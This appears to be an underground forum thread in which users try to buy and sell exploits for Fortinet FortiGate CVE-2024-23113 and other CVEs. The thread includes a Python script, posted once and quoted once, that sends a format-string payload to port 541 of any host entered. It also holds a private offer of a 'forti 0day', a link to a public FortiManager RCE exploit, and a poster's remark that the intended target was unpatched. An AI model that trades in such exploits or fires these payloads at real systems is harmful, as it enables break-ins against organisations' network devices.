[BUYING] CVE-2024-23113 FortiGate Exploit!

[nickzfam]

Цена

50-150

Контакты

6E9D910752250CED7D1A920ED1FDC61C87E2EA51E3204A9BD4531ADE4056CE530F197E3BAC05

EN:

Hello all,

I am looking to buy an exploit code for the CVE in the title. Dm me on qTox. It is in my signature.

Thanks a lot,
Nickzfam
-------------------------------------------------------------------------------------------------------------------------------------

RU:

Всем здравствуйте,

Я хочу купить код эксплойта для CVE, указанный в заголовке. Напишите мне в qTox. Это у меня в подписи.

Большое спасибо,
Nickzfam

 

[nickzfam]

If you have any of these I will also purchase:

1. CVE-2024-20329
2. CVE-2024-49669
3. CVE-2024-49668
4. CVE-2024-49658
5. CVE-2024-49653
6. CVE-2024-49652
7. CVE-2024-49671
8. CVE-2024-47575
9. CVE-2024-47901
10. CVE-2024-48904

 

[prosper]

also interested

 

[cyber_tatyana]

yeah, everyone is interested to have sophisticated exploits but what kind of developer or seller is ok to develop or sell it to you?

 

[Sec13B]

import socket
import ssl
import struct

def check_vulnerability(hostname):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.options |= ssl.OP_NO_COMPRESSION

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(5)
        try:
            sock.connect((hostname, 541))
        except socket.error as e:
            print(f"[-] Could not connect to {hostname}: {e}")
            return False

        try:
            with context.wrap_socket(sock, server_hostname=hostname) as ssock:
                initial_data = ssock.recv(8)
                if len(initial_data) < 8:
                    print("[-] Failed to receive enough data from the server.")
                    return False

                pkt_flags = struct.unpack('i', initial_data[:4])[0]
                pkt_len = struct.unpack('i', initial_data[4:])[0] - 2

                payload = ssock.recv(pkt_len - 8)
                if len(payload) < pkt_len - 8:
                    print("[-] Incomplete payload received.")
                    return False

                format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
                packet = b''
                packet += 0x0001e034.to_bytes(4, 'little')
                packet += (len(format_string_payload) + 8).to_bytes(4, 'big')
                packet += format_string_payload

                ssock.send(packet)

                response = ssock.recv(1024)
                if response:
                    print("[+] Device is likely not vulnerable - received response.")
                    return False
                else:
                    print("[+] No response received - further analysis needed.")
                    return False
        except ssl.SSLError as ssl_err:
            if "tlsv1 alert" in str(ssl_err).lower():
                print(f"[+] Device {hostname} is vulnerable. Connection aborted as expected.")
                return True
            else:
                print(f"[-] Unexpected SSL error: {ssl_err}")
                return False
        except socket.error as sock_err:
            print(f"[-] Socket error: {sock_err}")
            return False

def main():
    while True:
        hostname = input("Enter the hostname to check (or 'exit' to quit): ")
        if hostname.lower() == 'exit':
            break

        is_vulnerable = check_vulnerability(hostname)
        if is_vulnerable:
            print(f"[!] Warning: {hostname} is vulnerable!")
        else:
            print(f"[+] {hostname} appears to be patched[.]")

if __name__ == "__main__":
    main()

 

[nickzfam]

import socket
import ssl
import struct

def check_vulnerability(hostname):
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
    context.check_hostname = False
    context.verify_mode = ssl.CERT_NONE
    context.options |= ssl.OP_NO_COMPRESSION

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(5)
        try:
            sock.connect((hostname, 541))
        except socket.error as e:
            print(f"[-] Could not connect to {hostname}: {e}")
            return False

        try:
            with context.wrap_socket(sock, server_hostname=hostname) as ssock:
                initial_data = ssock.recv(8)
                if len(initial_data) < 8:
                    print("[-] Failed to receive enough data from the server.")
                    return False

                pkt_flags = struct.unpack('i', initial_data[:4])[0]
                pkt_len = struct.unpack('i', initial_data[4:])[0] - 2

                payload = ssock.recv(pkt_len - 8)
                if len(payload) < pkt_len - 8:
                    print("[-] Incomplete payload received.")
                    return False

                format_string_payload = b"reply 200\r\nrequest=auth\r\nauthip=%n\r\n\r\n\x00"
                packet = b''
                packet += 0x0001e034.to_bytes(4, 'little')
                packet += (len(format_string_payload) + 8).to_bytes(4, 'big')
                packet += format_string_payload

                ssock.send(packet)

                response = ssock.recv(1024)
                if response:
                    print("[+] Device is likely not vulnerable - received response.")
                    return False
                else:
                    print("[+] No response received - further analysis needed.")
                    return False
        except ssl.SSLError as ssl_err:
            if "tlsv1 alert" in str(ssl_err).lower():
                print(f"[+] Device {hostname} is vulnerable. Connection aborted as expected.")
                return True
            else:
                print(f"[-] Unexpected SSL error: {ssl_err}")
                return False
        except socket.error as sock_err:
            print(f"[-] Socket error: {sock_err}")
            return False

def main():
    while True:
        hostname = input("Enter the hostname to check (or 'exit' to quit): ")
        if hostname.lower() == 'exit':
            break

        is_vulnerable = check_vulnerability(hostname)
        if is_vulnerable:
            print(f"[!] Warning: {hostname} is vulnerable!")
        else:
            print(f"[+] {hostname} appears to be patched[.]")

if __name__ == "__main__":
    main()

Thanks for the code.

Although, it seems to only be testing if the host is vulnerable to it by resetting the connection.

 

[nickzfam]

yeah, everyone is interested to have sophisticated exploits but what kind of developer or seller is ok to develop or sell it to you?

"Sophisticated" its a fucking format string

 

[cyber_tatyana]

"Sophisticated" its a fucking format string

call it whatever you want. you can't contact the professionals easily unless you have reputation in forum or prove you're a pro.

 

[nickzfam]

Really need 2024-23113... Someone DM

 

[0nebob]

I have forti 0day, PM

 

[Енот_Полоскун]

what you will do with it and she already patched ?

 

[blacrabbit]

Jeśli masz któryś z nich, kupię również:

1. CVE-2024-20329
2. CVE-2024-49669
3. CVE-2024-49668
4. CVE-2024-49658
5. CVE-2024-49653
6. CVE-2024-49652
7. CVE-2024-49671
8. CVE-2024-47575
9. CVE-2024-47901
10. CVE-2024-48904

GitHub - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575: Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575 - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

github.com

 

[MorganBH]

"Sophisticated" its a fucking format string

Format string u say)??
FORTIFY_SOURCE... =)

 

[nickzfam]

GitHub - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575: Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575

Fortinet Fortimanager Unauthenticated Remote Code Execution AKA FortiJump CVE-2024-47575 - watchtowrlabs/Fortijump-Exploit-CVE-2024-47575

github.com

yeah, but I read and 47575 has the requirement of having the fortigate cert extracted... (need to be on the server)...

 

[nickzfam]

what you will do with it and she already patched ?

at the time of writing she wasnt)